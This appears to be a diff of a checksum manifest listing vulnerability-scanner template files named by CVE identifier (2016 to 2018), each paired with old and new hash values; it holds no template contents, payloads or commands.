-http/cves/2016/CVE-2016-1000155.yaml:2593c713fa519135dfb57c496ed29717442b4d1e -http/cves/2016/CVE-2016-10033.yaml:07e175a97834dc66dd1b1aa53488674ec28d99ee -http/cves/2016/CVE-2016-10108.yaml:4ad5dcf1e80c55a63c1a2c20f78518c788682a3c -http/cves/2016/CVE-2016-10134.yaml:d5d72c88d30e317cbd66969833a6926430e67452 -http/cves/2016/CVE-2016-10367.yaml:03998afbe088954045fe7c95a156012c703468e1 -http/cves/2016/CVE-2016-10368.yaml:48a6f0568fc5bd0b8d2da813f1551cc0f14817c0 -http/cves/2016/CVE-2016-10924.yaml:93ae1c57b6f6e841ca49b9789fa4caa8bcdc66fa +http/cves/2016/CVE-2016-1000154.yaml:7a051fc4ae2373f86ad53f6abdda4d7096fdf62e +http/cves/2016/CVE-2016-1000155.yaml:647dfeeec99b332ef140771291662d1cbe99286a +http/cves/2016/CVE-2016-10033.yaml:232d83356ff34a267485bcb25a7dbf545fce3e88 +http/cves/2016/CVE-2016-10108.yaml:fec37410b6b632419f59b6c386bf2ad37db2282c +http/cves/2016/CVE-2016-10134.yaml:cb89300fac923d957bf6f61202f8fdc1159d643a +http/cves/2016/CVE-2016-10367.yaml:7e0f439a28a7d9e0294a6752135175a00d4df520 +http/cves/2016/CVE-2016-10368.yaml:f7e31f13e4b1e7d3e9e714d3333462629b0a0e35 +http/cves/2016/CVE-2016-10924.yaml:f0f8949f73e892e9f269db834c2b6872c15f5a07 http/cves/2016/CVE-2016-10940.yaml:180cd258d3c386e8bba06f4d17e019d36486d58f -http/cves/2016/CVE-2016-10956.yaml:6ddebb530a65c19dc55dcac04bb17195a2d199f0 +http/cves/2016/CVE-2016-10956.yaml:3c167a0e9cca4b786fda517c6bc7668cee4141db http/cves/2016/CVE-2016-10960.yaml:b712cb8e00ee7b482822de5367d1981a182200d6 -http/cves/2016/CVE-2016-10973.yaml:6ec26f4101c693c2a5c27c2a51b6bd7cd06c958c -http/cves/2016/CVE-2016-10993.yaml:c3bd4f71c842bba3db2514df40096f1ee68a1704 -http/cves/2016/CVE-2016-1555.yaml:1d2bfa16bc81a12d2dcdb87791b49885c1173536 -http/cves/2016/CVE-2016-2389.yaml:04ae773cadb3cb1c5983e5adc34230df1dc8c648 -http/cves/2016/CVE-2016-3081.yaml:c320036374c13e57e99267fb6018d56e8acb8fbb -http/cves/2016/CVE-2016-3088.yaml:e94dfbbb1ff9cf8b1618b04d4101c0af4d09673e -http/cves/2016/CVE-2016-3978.yaml:d720d40651f85c198e21942edbed743c64a9f8f0 +http/cves/2016/CVE-2016-10973.yaml:436451c68c9ddcd9b94a26278477ae2c41a1d880 +http/cves/2016/CVE-2016-10993.yaml:9bdd195c57b0946d4ed5c3df87dfd5837de8a22c +http/cves/2016/CVE-2016-1555.yaml:6b3e893a1320115b0e18d785105a0f7d5775d683 +http/cves/2016/CVE-2016-2389.yaml:928ce62f5f7913e63131cdb7484fc7b35ab40f9e +http/cves/2016/CVE-2016-3081.yaml:1085462cce049c99ca76f547b4599989a14efc98 +http/cves/2016/CVE-2016-3088.yaml:f91d8ac41e4432028cfbede6964661454e2331ff +http/cves/2016/CVE-2016-3978.yaml:b59e9ed3e4c91df88b86bb456095ec9ed543d290 http/cves/2016/CVE-2016-4437.yaml:4d774c5cc985a117d6a2214f892423f5c636d32e -http/cves/2016/CVE-2016-4975.yaml:3c579d1811852cd5ec879c48517456e16db5bee3 +http/cves/2016/CVE-2016-4975.yaml:98681241e1d9f4db62b42820bba949ed2f152e2b http/cves/2016/CVE-2016-4977.yaml:ee48ddeac3b6d5461bc8980481e880af947436db http/cves/2016/CVE-2016-5649.yaml:beebd1faee4723faa26e1f0fe5a73e59628c2cfa -http/cves/2016/CVE-2016-5674.yaml:d66c224b8e31aac1148c8a8222fd05d0bf83f4f5 -http/cves/2016/CVE-2016-6195.yaml:cc759bb391932b601d77a77782a08789c3b0e29e +http/cves/2016/CVE-2016-5674.yaml:05184cce04ffa241bc304b0f242daaec7107280a +http/cves/2016/CVE-2016-6195.yaml:108d4b0cb54ea491a3c8e177bc56a13f8162dfbb http/cves/2016/CVE-2016-6277.yaml:c93b89da0c42f6e280440504cb3dd67c981a8d17 http/cves/2016/CVE-2016-6601.yaml:afa3f46e2bae4d3e90c1f403147d3e8a5b7d5739 -http/cves/2016/CVE-2016-7552.yaml:4f0c37827b9def8ef834d15f76bc2eba2f73c20a +http/cves/2016/CVE-2016-7552.yaml:b8c439538226b5eca13f4e80bf74f0ac0cd45749 http/cves/2016/CVE-2016-7834.yaml:11e35334c12e72dab14682a71d851436eb898e8e -http/cves/2016/CVE-2016-7981.yaml:eff26ab72ed98f672b3893bbc6f087847dd3c6ec -http/cves/2016/CVE-2016-8527.yaml:3c885a2ec3ec1f060a62e99dbaf16bd93ff32ae6 -http/cves/2017/CVE-2017-0929.yaml:d991797935a9f79ff7d504f4eabb9781d66a9937 -http/cves/2017/CVE-2017-1000028.yaml:4a38a181854f0963809b9a92cbf860a76d5934e0 -http/cves/2017/CVE-2017-1000029.yaml:7ba91d7c08f4e2feb3bd20daa0195baca63b141e +http/cves/2016/CVE-2016-7981.yaml:948a6727c2a8d4385c276e5d1e567cf6938371cd +http/cves/2016/CVE-2016-8527.yaml:de4d4d55ae233f9d0cc2cccf2527eaa43f2404fe +http/cves/2017/CVE-2017-0929.yaml:689211627cec05f38e3139c3f39271bd9542eb43 +http/cves/2017/CVE-2017-1000028.yaml:80cbf906dcacf0ba374dcacaec27b5e8b36e01df +http/cves/2017/CVE-2017-1000029.yaml:876ec94e59e9130cb5d34ff5c4a1e620251c37b0 http/cves/2017/CVE-2017-1000163.yaml:0c603eb787ab15dd4f944ea5b87b78f4af11afb8 http/cves/2017/CVE-2017-1000170.yaml:7ba7587d2b35dc762634a2c9490ca0bdea3fda51 http/cves/2017/CVE-2017-1000486.yaml:5345b553ebe658749c5016c21fc17f4e7fdc12aa -http/cves/2017/CVE-2017-10075.yaml:641ab314a6e2f53762cdf2a0f3897c1cfb77974e -http/cves/2017/CVE-2017-10271.yaml:9d413c1811cf3686bcd4e9d2e3f1dfc0473aa72a +http/cves/2017/CVE-2017-10075.yaml:4bfbacc8e70549ff7a5b7f9e8ab3cca9f0f0948d +http/cves/2017/CVE-2017-10271.yaml:9b29a0d9242daab5c40fe8271718a8de9207e06e http/cves/2017/CVE-2017-10974.yaml:b0ae2bfd11149aecfa26d8faa954a8f8292f171c -http/cves/2017/CVE-2017-11165.yaml:033bfb79031486baf87201b5bfdd78e9d5708ddf -http/cves/2017/CVE-2017-11444.yaml:9e1e2a2b3a2e7551bf784ee43d7ab6eddf17586b -http/cves/2017/CVE-2017-11512.yaml:c9aeca8c1b8393dbd10f801c430d9bccf1c56024 +http/cves/2017/CVE-2017-11165.yaml:335f7c179dccc3c2ea100da30d83ef0a2fca00d6 +http/cves/2017/CVE-2017-11444.yaml:a388e3b68002ab31cb33b61d088534f8d1b273a4 +http/cves/2017/CVE-2017-11512.yaml:551d25f72869af07044971e06d7c9aef09a9eeae http/cves/2017/CVE-2017-11586.yaml:cb58394e00a6e06966ba607d6a4ebca3ac268972 -http/cves/2017/CVE-2017-11610.yaml:eb78eddbb2fcab5fa16129517a797b6bdb5732f5 +http/cves/2017/CVE-2017-11610.yaml:ad211be750982c1ef4165048da870fb2e789c67b http/cves/2017/CVE-2017-11629.yaml:fc84633073745770603d19a552733beea2ac9779 -http/cves/2017/CVE-2017-12138.yaml:489f8ed13f4cb45474c7dd415f949f58d2e527d9 -http/cves/2017/CVE-2017-12149.yaml:7592bc1509f9f9fe1a95fd892fb1fde0741cbeca +http/cves/2017/CVE-2017-12138.yaml:676cfe5f8f65f4ed3f4cf5846ba3b05c28e13e41 +http/cves/2017/CVE-2017-12149.yaml:5cfca7ee5636a93632aeb615f1d427aee75013cd http/cves/2017/CVE-2017-12542.yaml:0f4e30ef500ff64da2e8c5eca028a1dd35a44f6c -http/cves/2017/CVE-2017-12544.yaml:f1c29b43556fb369e47d4cb76075f2a29f1ce42f -http/cves/2017/CVE-2017-12583.yaml:b2c905c923b983ffc7bf1594af70ddfb6364d82d -http/cves/2017/CVE-2017-12611.yaml:92b9fa46b705313c0802c2b2052522c252e38c4a -http/cves/2017/CVE-2017-12615.yaml:658591eca02d16896bf1de63e11184e8c94eb114 -http/cves/2017/CVE-2017-12617.yaml:97b693df4d281505706c2bfc655204d3b6c6bd31 -http/cves/2017/CVE-2017-12629.yaml:b15218a1d9735f83829b8c3f5d88844372a8dc67 -http/cves/2017/CVE-2017-12635.yaml:9a87836fee73257459dd22c52df8cf282511aa3c -http/cves/2017/CVE-2017-12637.yaml:b62ba5d049e7de09b22fc435fd1d8bb93a49aebe -http/cves/2017/CVE-2017-12794.yaml:931ca495a59e90e43e2088f8bd2b98b757df6b8a -http/cves/2017/CVE-2017-14135.yaml:f9a00d39f3645085974c85bb85f110ee83b91db2 -http/cves/2017/CVE-2017-14186.yaml:3ff44039ab5995e4d70e3f03f63714a50d975df1 -http/cves/2017/CVE-2017-14524.yaml:89909bde93c70dbc1eecba358bd6b0e9f721ab0a -http/cves/2017/CVE-2017-14535.yaml:393824e4fae232b8c9c613fb1995297f810d80aa +http/cves/2017/CVE-2017-12544.yaml:c4eae0c6efa6c3fc9ded84cc1e4624951ba966f9 +http/cves/2017/CVE-2017-12583.yaml:4b305b31b1330fdb1c24ec5787f57c060a42c11c +http/cves/2017/CVE-2017-12611.yaml:72658b1e16883bf8fe5ab1b8a0357e7c1518df56 +http/cves/2017/CVE-2017-12615.yaml:c912d36a03fb120bd0925b58561dbae629d345b5 +http/cves/2017/CVE-2017-12617.yaml:d92e32ab1c635908b9f63c99eedbc85476df017b +http/cves/2017/CVE-2017-12629.yaml:1b9b31ff6170297ba3b4f6fce3f0fd545c3f0a5d +http/cves/2017/CVE-2017-12635.yaml:db4eebc97e2ae1fa1558cdde2bf1123b319959c1 +http/cves/2017/CVE-2017-12637.yaml:f6a1b763290d992add7cf068d6051031c21f47b1 +http/cves/2017/CVE-2017-12794.yaml:4fe35ab1aaf9361761a37580d0c94f1bb8962c29 +http/cves/2017/CVE-2017-14135.yaml:fd02174fcd39ebd97a8ac4f34b6318d407d31e96 +http/cves/2017/CVE-2017-14186.yaml:e696378be2d403a776827e81a021a037942ef508 +http/cves/2017/CVE-2017-14524.yaml:eb53f561b7702df075913dd2c473245064faf3c0 +http/cves/2017/CVE-2017-14535.yaml:d6d786c498806e7d3fece3f2b9f853bdab962254 http/cves/2017/CVE-2017-14537.yaml:b63bf53960d40b3f5711d611754cb9a86ee8c053 -http/cves/2017/CVE-2017-14622.yaml:f451a8f5a39697e2ffacd9bab2fc9cf2c35b4d9b -http/cves/2017/CVE-2017-14651.yaml:eef399098a0804d41f1c9bc23b0d1aea27bad63f -http/cves/2017/CVE-2017-14849.yaml:8f9a241ef3b3cd17cb1e73e604d999a092279173 +http/cves/2017/CVE-2017-14622.yaml:eb5b0b5643d963dc7d8d48e3eb928ba7c46c31a4 +http/cves/2017/CVE-2017-14651.yaml:3bbb9436f3323be25dcb01b3b5157828bfcacfdc +http/cves/2017/CVE-2017-14849.yaml:b0590b97b7773681e21e4286050705c3003a1305 http/cves/2017/CVE-2017-15287.yaml:6000296cdf09698cffa12c51e003822697406662 http/cves/2017/CVE-2017-15363.yaml:1ff2f8921e452c8a14847f6dee1c5340ce2e4e49 http/cves/2017/CVE-2017-15647.yaml:f63b7309ad40a6ccf4c6af1f518e911416eb2ec3 -http/cves/2017/CVE-2017-15715.yaml:efe915f2fd523d0e3d9cf9b29e0e6397cfa19149 -http/cves/2017/CVE-2017-15944.yaml:fc133715accd0ad9a65b56f92e8a429494f046a0 -http/cves/2017/CVE-2017-16806.yaml:bcacb1043654c818b2ab5fc9de5fb9bc05579b1f -http/cves/2017/CVE-2017-16877.yaml:be9ffb239e9d692bdbc98071720d8895b9fd4d1c +http/cves/2017/CVE-2017-15715.yaml:27f869507d13b8dedc776c4fb9c4063c8dd73c3d +http/cves/2017/CVE-2017-15944.yaml:0dbecebb30affc23bec8b2a1193ffc5cb92ed3b3 +http/cves/2017/CVE-2017-16806.yaml:01a0fb38f29898ae3ee66414fd284d286c8af403 +http/cves/2017/CVE-2017-16877.yaml:a5759ca704cd8d23987d433fa76c18a18424220a http/cves/2017/CVE-2017-16894.yaml:cc779a98a64aa8bbeb1694c3f0922a45974063b6 -http/cves/2017/CVE-2017-17043.yaml:4ecedc3af33c37de40d7de410d482bc8bdd1b6b5 -http/cves/2017/CVE-2017-17059.yaml:8e1f808c593421881893246f3f569795cb5c9809 -http/cves/2017/CVE-2017-17451.yaml:996d75504b1efc63787d35dcf5bfbdf79109ffb8 -http/cves/2017/CVE-2017-17562.yaml:d9c6119f0250b1c1e561268994badaeca6b6d3d3 +http/cves/2017/CVE-2017-17043.yaml:d66d885d7578369ae2b82e2e985e722e324dddd9 +http/cves/2017/CVE-2017-17059.yaml:423a292f21591120f88595e2138cab3dc318a902 +http/cves/2017/CVE-2017-17451.yaml:cfdd77524c14ea2d409baea560ea2f0853e6b8a8 +http/cves/2017/CVE-2017-17562.yaml:9547b1a2aad01541a5002fdfe7bc5e9e477e9963 http/cves/2017/CVE-2017-17731.yaml:3f51a3a99f2e8b5bfd36c145bbabaea0607acd75 -http/cves/2017/CVE-2017-17736.yaml:25208e44bc9dc7c21610939cd52248407d0a9c7b -http/cves/2017/CVE-2017-18024.yaml:78fd69b941954a1798dd36385f578b8e6ef9c5e6 -http/cves/2017/CVE-2017-18487.yaml:6935d143eca3c0c0b2114f162c63ff68e65364ab -http/cves/2017/CVE-2017-18490.yaml:208d02fd73a3be7ad8cf4921987062b8f1b44cfe -http/cves/2017/CVE-2017-18491.yaml:842f490cc1ce8f6783736c9c39ba34c063a0942f -http/cves/2017/CVE-2017-18492.yaml:47602a52ca1122e6f68cdd144604c70737c40930 -http/cves/2017/CVE-2017-18493.yaml:17dcb7a769ae5fddb2ada02d71c438a8ed8f5941 -http/cves/2017/CVE-2017-18494.yaml:b8df1f7191cebbb55aed4fad6d5eaf130fdbbc9c -http/cves/2017/CVE-2017-18496.yaml:bfafcdc74967f073e1bc2b5b174e4c0a1d484fbf -http/cves/2017/CVE-2017-18500.yaml:9910fc572e5a3631b4ef738523a2db880a579acd -http/cves/2017/CVE-2017-18501.yaml:b496cd413e7d05e1ac162687838c0cacbc590d66 -http/cves/2017/CVE-2017-18502.yaml:269018719c901096efb52d104d2d3f8651d6629a -http/cves/2017/CVE-2017-18505.yaml:9a41e6be2699c03bec2ce41d81d9ca175d435252 -http/cves/2017/CVE-2017-18516.yaml:24e82950664cdf5fbd79f2944e3083afb0a891fd -http/cves/2017/CVE-2017-18517.yaml:d41caf3f42982bcf313e4be2f0ba9a8df98184bb -http/cves/2017/CVE-2017-18518.yaml:cd8537572230fa88ec78d3b6c9509ba7fcb43d7d -http/cves/2017/CVE-2017-18527.yaml:d0b57cc290e45c6eee46766933210901c53ccd11 -http/cves/2017/CVE-2017-18528.yaml:a63ad8d19db7a1ca7e4a7c7eb724bc1f172bff44 -http/cves/2017/CVE-2017-18529.yaml:0120c9b0d8f81576756fd3aeeda2c4d0d4abe05e -http/cves/2017/CVE-2017-18530.yaml:fd5d1cc43cc698ffbbd8d503b57088ec71677eb6 -http/cves/2017/CVE-2017-18532.yaml:49a23b489011e2867db195ab65c1b0f72cbf1e75 -http/cves/2017/CVE-2017-18536.yaml:4711a9310f4e0b2304a7e98e50839149d9518e76 -http/cves/2017/CVE-2017-18537.yaml:74cd88a458cf737926650c6b54eef76097f53240 -http/cves/2017/CVE-2017-18542.yaml:1599af8ede55d1f0e3ac1a657b4ff8ed9b6448a9 -http/cves/2017/CVE-2017-18556.yaml:907a09d41a0d88070f8f2041fdb11c16e85bfbcf -http/cves/2017/CVE-2017-18557.yaml:c45088f07f554991bb2f0f483866395a6068f497 -http/cves/2017/CVE-2017-18558.yaml:16f29bd3ea8ca20ea876e0716ee3083fff491790 -http/cves/2017/CVE-2017-18562.yaml:fee3135f7a5a62a0e6fe691075b1ee9fd61c76cc -http/cves/2017/CVE-2017-18564.yaml:3c3b33cc2efbe4112199dc4d9326fb7e9071270f -http/cves/2017/CVE-2017-18565.yaml:a3b3a2ad8c5c28e69e03af3629ae9ed998fab3bc -http/cves/2017/CVE-2017-18566.yaml:91dd65d7d06d53ba0392a9408ab7c5a6f6ed364c -http/cves/2017/CVE-2017-18598.yaml:03e5aee9bf9d77842f6442ced256a8645c16a0eb -http/cves/2017/CVE-2017-18638.yaml:5a7f0211b67dc45557b1d6078fc6f82a76585398 -http/cves/2017/CVE-2017-3506.yaml:b90e80de67334cc4273e54b2ffad415d77b74251 -http/cves/2017/CVE-2017-3528.yaml:1adb19d08d323349670d12a7176eaa18b904d2c0 -http/cves/2017/CVE-2017-4011.yaml:d26bb4b50d4f448143635e92a93cabd68e6cd479 +http/cves/2017/CVE-2017-17736.yaml:70a8d778dc0695ca6f3e7875e8ca29aabe8eefbc +http/cves/2017/CVE-2017-18024.yaml:7ad02d50552197493d2329d6750671539f097603 +http/cves/2017/CVE-2017-18487.yaml:18c6da8e5ed2e735a102165398d971d35cd96fcb +http/cves/2017/CVE-2017-18490.yaml:aba5f23b2aef25445c641328a6ddc3e987bc8f0e +http/cves/2017/CVE-2017-18491.yaml:87c9b463bdfa96302ff4018e7e55df14a8892a8a +http/cves/2017/CVE-2017-18492.yaml:cf11958620dcfe04715b3e510fec476d0ac23af5 +http/cves/2017/CVE-2017-18493.yaml:6e99015904657d7324ee061d06a4f38938fe5e64 +http/cves/2017/CVE-2017-18494.yaml:a1a215937628bac45037637e3b56de380fe1fc5b +http/cves/2017/CVE-2017-18496.yaml:c918d0780a51c89081a65e495fed915d32c6d989 +http/cves/2017/CVE-2017-18500.yaml:328b89f371566ab0c7cc4ad131bb840605d3a110 +http/cves/2017/CVE-2017-18501.yaml:1963e8addb6e82ca38b406b512a15a4aaad84a09 +http/cves/2017/CVE-2017-18502.yaml:1ab4e124d406d2430332fc28bfb1451170ebd51e +http/cves/2017/CVE-2017-18505.yaml:a1b07dc2eb977736183e951ed2f7dacb8fdc9638 +http/cves/2017/CVE-2017-18516.yaml:cf6a0a1c40c0bfd362bfc15605689f155be88305 +http/cves/2017/CVE-2017-18517.yaml:c7144d2eb0744b8ec32b547c3e2f42de76396ad2 +http/cves/2017/CVE-2017-18518.yaml:b993c19050e2224a427f62975d0428f1e1a93909 +http/cves/2017/CVE-2017-18527.yaml:4381542ae3dda5483088fe923f8c4ccddc4110e0 +http/cves/2017/CVE-2017-18528.yaml:d3c1ed61c27edf32241fe9dbea66b001054f184a +http/cves/2017/CVE-2017-18529.yaml:815c2dac5e98cc90c59c0f44ab02ce6f4af2a698 +http/cves/2017/CVE-2017-18530.yaml:b948f523f2a8f4a2d4ff22f216a6da7a7c14cb5a +http/cves/2017/CVE-2017-18532.yaml:527911bf8931c9cc9a89c6dd47f72e1e917e8d01 +http/cves/2017/CVE-2017-18536.yaml:be20e319ddf44c48e682606863c8bb669169b73b +http/cves/2017/CVE-2017-18537.yaml:323652d96c20ca84bbf364b0c39c489c879a2be9 +http/cves/2017/CVE-2017-18542.yaml:4860bdedb8eef5f2f25a6eb543757f6e081e528b +http/cves/2017/CVE-2017-18556.yaml:0e9aa4dd05abcaa53bd8659715d53e8127a82230 +http/cves/2017/CVE-2017-18557.yaml:8836164173657270b90495bcc3b07b50b3416949 +http/cves/2017/CVE-2017-18558.yaml:9c20a4c29e4af9f616d1cb76b7d71a990bddeff1 +http/cves/2017/CVE-2017-18562.yaml:2b0e335f62ace14516ca1d2b53eabb5e91fb4c4c +http/cves/2017/CVE-2017-18564.yaml:12c5ce5624db3a6ba010aa3ea9ba7c55d53f5ecc +http/cves/2017/CVE-2017-18565.yaml:68a894157caff6326df9bfef799d7d19647ff97d +http/cves/2017/CVE-2017-18566.yaml:28e689c2192d98d78215ef0d9178cd61645644b5 +http/cves/2017/CVE-2017-18598.yaml:741d867d16cacf520035fa44376841fdd2a4181a +http/cves/2017/CVE-2017-18638.yaml:9c3a2bf93f02877b319955bf5112b033815fb876 +http/cves/2017/CVE-2017-3506.yaml:837bfce7c2c79bb9b7598e4c594e44cd0dceec41 +http/cves/2017/CVE-2017-3528.yaml:33a1816704db08e4d524156a6a9c2dd3abd6df92 +http/cves/2017/CVE-2017-4011.yaml:9148db4589b153f37f6a0b1b357f4415564c1ff6 http/cves/2017/CVE-2017-5521.yaml:441d7bb12801dc564993e7673c6c9c31ab43f79c -http/cves/2017/CVE-2017-5631.yaml:da5852f436aefece302a1795b05e028153ab7b30 -http/cves/2017/CVE-2017-5638.yaml:065653ee455cb2dee7baa8690bd3dd5835cd14d4 -http/cves/2017/CVE-2017-5689.yaml:7e2c312474c7166e2af89aab6323de72d9e6c5d7 +http/cves/2017/CVE-2017-5631.yaml:1f75e71390098a2b178d30761f6527297ecce195 +http/cves/2017/CVE-2017-5638.yaml:f20f009e50a91ed6246b1ad844e8e0271cc31587 +http/cves/2017/CVE-2017-5689.yaml:3d378636d73676ad81608d04a18ae472cfb7f122 http/cves/2017/CVE-2017-5982.yaml:2cc9e80970cd0d0f3fddf4e79b615e8f80f945be -http/cves/2017/CVE-2017-6090.yaml:b28b3e28c0d52c2ee367c9c78b2ad913f0949d6b -http/cves/2017/CVE-2017-7269.yaml:9e313436b09e4f8ae88a198f58760f9a55373578 -http/cves/2017/CVE-2017-7391.yaml:e25d7a726fa44b926c005349fe3b65d9a3e1794f -http/cves/2017/CVE-2017-7615.yaml:4a3e9b8299a0258fedc1a737b810f61719302640 -http/cves/2017/CVE-2017-7855.yaml:e26b772308e8bd2eb841ec9fac729d5c2a37117e -http/cves/2017/CVE-2017-7921.yaml:a3d08122f2cae7319d19420e4cf6049c0c6d7104 -http/cves/2017/CVE-2017-7925.yaml:5d5edc67fc9b754ca8943764e11aeb06672ea8e2 +http/cves/2017/CVE-2017-6090.yaml:d2183a769b5e19fad263ff1676513f9e07acfa87 +http/cves/2017/CVE-2017-7269.yaml:05bdd55c99449dc10ce011f6cf0af28e32fdf894 +http/cves/2017/CVE-2017-7391.yaml:4646b749c40f4cc3537b3209b2b12dfdc5815f5c +http/cves/2017/CVE-2017-7615.yaml:0170f8be9ad3a523febbf30981796d08e3acb2b0 +http/cves/2017/CVE-2017-7855.yaml:fba622d2ce8474a21e56e12b00bdf6272866cf9e +http/cves/2017/CVE-2017-7921.yaml:288e08111c5be77443c8a2f8fe38664718bd35d8 +http/cves/2017/CVE-2017-7925.yaml:df55d9a466ec0d118376375b8d24822dc201aae4 http/cves/2017/CVE-2017-8229.yaml:5904f7e455bf3a8b4fdc772fb95abc1429f1ab66 -http/cves/2017/CVE-2017-8917.yaml:929fb18d698372ce898881effd2f6f52b64cda39 -http/cves/2017/CVE-2017-9140.yaml:8f987038728da169dbe6bc9eba7d3f5b46a90a28 +http/cves/2017/CVE-2017-8917.yaml:18eb560c3ae4a68bfb37e8e314b93ca835523ccc +http/cves/2017/CVE-2017-9140.yaml:185afc688b01aaa345e8891bfb89303663d71e13 http/cves/2017/CVE-2017-9288.yaml:f8dedeb9681681df484b827a5b6202feb453f565 -http/cves/2017/CVE-2017-9416.yaml:3af72783c0b6784c6b8ac1c6584d354202aee50e -http/cves/2017/CVE-2017-9506.yaml:e034c8c940863230d32ac825126b538b4db42f68 -http/cves/2017/CVE-2017-9791.yaml:00efcf8bf37fe77ed2534d335bf4e86f540593ac -http/cves/2017/CVE-2017-9805.yaml:4fe5223d9747e0cd6872564b8069d1d2074a8fdc -http/cves/2017/CVE-2017-9822.yaml:137875cd55de914baf6ad6cca7783b728484715c -http/cves/2017/CVE-2017-9833.yaml:c08b62014c13f6adbdf1b39fb6199d35f4df773c +http/cves/2017/CVE-2017-9416.yaml:db3a9e47909c6f2171b1e6ace465413df850e426 +http/cves/2017/CVE-2017-9506.yaml:6d296062b2c0a14857813ac8db198c208fc16c12 +http/cves/2017/CVE-2017-9791.yaml:14d06a00a2028cd5e48c65d7cbb5cd3a51399910 +http/cves/2017/CVE-2017-9805.yaml:81c3794f70f5ec9e768e11d5db0fa414b0732043 +http/cves/2017/CVE-2017-9822.yaml:c75acad11d35633968cb7f334420707edb941c1a +http/cves/2017/CVE-2017-9833.yaml:9aba0bb0c7751c252e7bf7ea5fd2e7ee78ddb555 http/cves/2017/CVE-2017-9841.yaml:b17dc781f051451822729dad1584ffc0a690d41a -http/cves/2018/CVE-2018-0127.yaml:b01f3b431d398441068d16cea655f42cd95a76dd +http/cves/2018/CVE-2018-0127.yaml:0f92834c92edc1e4e6fb9f1c0de00ede97dc410f http/cves/2018/CVE-2018-0296.yaml:8f811f713bd26781e42619b8ad3cdc084297b52c -http/cves/2018/CVE-2018-1000129.yaml:03328d29e7ad3ec82f00b8de687d940ec9060db9 -http/cves/2018/CVE-2018-1000130.yaml:c82881e9663b78ba5b44251f15b4e93555896100 -http/cves/2018/CVE-2018-1000226.yaml:4f0216946fd65c64fab71cb3f17771ea0c2b69b4 -http/cves/2018/CVE-2018-1000533.yaml:cdd21ba5b7737e1f0998ec7435a96567e94b642b +http/cves/2018/CVE-2018-1000129.yaml:61c2fdfd04f6c32faad5ebd2e7aa4d4c324a59ee +http/cves/2018/CVE-2018-1000130.yaml:f438d5219e7182e5013ca0f3fb3cd42011642ae9 +http/cves/2018/CVE-2018-1000226.yaml:441edaab2341a22ae577dbd23ae9468d5a73ffa4 +http/cves/2018/CVE-2018-1000533.yaml:948a6a9de7072936bbca5c7d7388c91ef52bc4d3 http/cves/2018/CVE-2018-1000600.yaml:910c040b7e95fb65e496c661906baaf38381897a -http/cves/2018/CVE-2018-1000671.yaml:44d8fe0eac2ae78b9d22edb73595990c06ebde57 -http/cves/2018/CVE-2018-1000856.yaml:69dcdc3b6ac4d491f9b496f8b50b8ba140eeebe4 -http/cves/2018/CVE-2018-1000861.yaml:61dae654149f3cee58e21f62a05e4b2fae52438c +http/cves/2018/CVE-2018-1000671.yaml:8d16d19b0cc9c32fb10b68f382e9da526e243533 +http/cves/2018/CVE-2018-1000856.yaml:1bd6db921f03613d4e0f5f1b74341cb229675d76 +http/cves/2018/CVE-2018-1000861.yaml:19d67582d28f6a4ab97c800961d4b69d1c13c958 http/cves/2018/CVE-2018-10093.yaml:c9b9167e15f9893649b46486f1cd02ddbadcf6af http/cves/2018/CVE-2018-10095.yaml:b575dc701664434c37703e8ecd03ad7b09e924d8 -http/cves/2018/CVE-2018-10141.yaml:a99b6696843034f25e51641e8a55b5a827e56caa +http/cves/2018/CVE-2018-10141.yaml:660c2a25c83aafda43e6bce0992cc916a0108db7 http/cves/2018/CVE-2018-10201.yaml:e3825699cee6c241f0a763a3d9d3eb0c07723d9c -http/cves/2018/CVE-2018-10230.yaml:2bf1607129fe202955a8f46a3745d2e7daa0a430 -http/cves/2018/CVE-2018-10562.yaml:8c60453b28e05f86ec595fa3b988cc59e1ce05ea -http/cves/2018/CVE-2018-10735.yaml:43eb94c84eb1e72070c54a912b00b7df1c21283c -http/cves/2018/CVE-2018-10736.yaml:0ccd2808913e1421e39912acc3b0c01463b827f2 -http/cves/2018/CVE-2018-10737.yaml:bf3893cedbfd6b1086d77e0d6b15b1e3c62b7536 -http/cves/2018/CVE-2018-10738.yaml:fae02457f302fd57c9b91ffa8bd3b716d0cc30a6 +http/cves/2018/CVE-2018-10230.yaml:605cf859fd96ff7e9df95aa31ea7037f31f4534c +http/cves/2018/CVE-2018-10562.yaml:0f2de60fa8395472e584d1731c0e94482f070ff2 +http/cves/2018/CVE-2018-10735.yaml:7ae8a70c70fc84d480e2a84dd90da750053a6252 +http/cves/2018/CVE-2018-10736.yaml:4539e3b3bc9c95fec713e4473dcd9706839a84fb +http/cves/2018/CVE-2018-10737.yaml:60b40993477e1edd14ed412903f9fad6a97ff5d0 +http/cves/2018/CVE-2018-10738.yaml:b6927d277dea39fb3a3af753bea42b23d769f34a http/cves/2018/CVE-2018-10818.yaml:efa3271174cdf4babcac2932f09ca4d5e35b49d2 http/cves/2018/CVE-2018-10822.yaml:7f0a230ae784c9666bb8be847c4b06e77ecf6a28 -http/cves/2018/CVE-2018-10823.yaml:ef89ea35d46f99e0318b8b0c1bf37ffe8cbee9a7 -http/cves/2018/CVE-2018-10942.yaml:ef196223e27d393c09d9f2ed5421d599f2d33cc7 -http/cves/2018/CVE-2018-10956.yaml:1ebc2fdb8426f38e9ca6d2c3bf02241c83d8f40b -http/cves/2018/CVE-2018-11227.yaml:0704dcac407abd6440c698cccfc3aba93291059d +http/cves/2018/CVE-2018-10823.yaml:e56ee0f2e55b63e521584879d4b3323de92515af +http/cves/2018/CVE-2018-10942.yaml:94d0ecb193f659447722f98f25a13f0a514e2bb4 +http/cves/2018/CVE-2018-10956.yaml:239655fecf2e6394829d36f8d14c29ca20f80c43 +http/cves/2018/CVE-2018-11227.yaml:6479757ec8c8091338264768aab66c062db6aac6 http/cves/2018/CVE-2018-11231.yaml:51626c805600f217d4c3eb66418488e1e9b39398 -http/cves/2018/CVE-2018-11409.yaml:1c10e1483e2f51965c66795eee34dd3394a21260 -http/cves/2018/CVE-2018-11473.yaml:471b0340786a579e3b4968f36d5cda80b370dbdc -http/cves/2018/CVE-2018-11709.yaml:36ce75376e3339ca9324e2ffa05f1daac5659936 -http/cves/2018/CVE-2018-11759.yaml:7cdec7352e198fb22c496626905497dba38cdd2a -http/cves/2018/CVE-2018-11776.yaml:2c098c86e47d5392b52f3b5ff6995a7bffd985a2 -http/cves/2018/CVE-2018-11784.yaml:d81453029d720837f9a1327444ba0bcf0bfa186b -http/cves/2018/CVE-2018-12031.yaml:8a71c917a741e3eeaffd76ddfe7024b0fdaf0e52 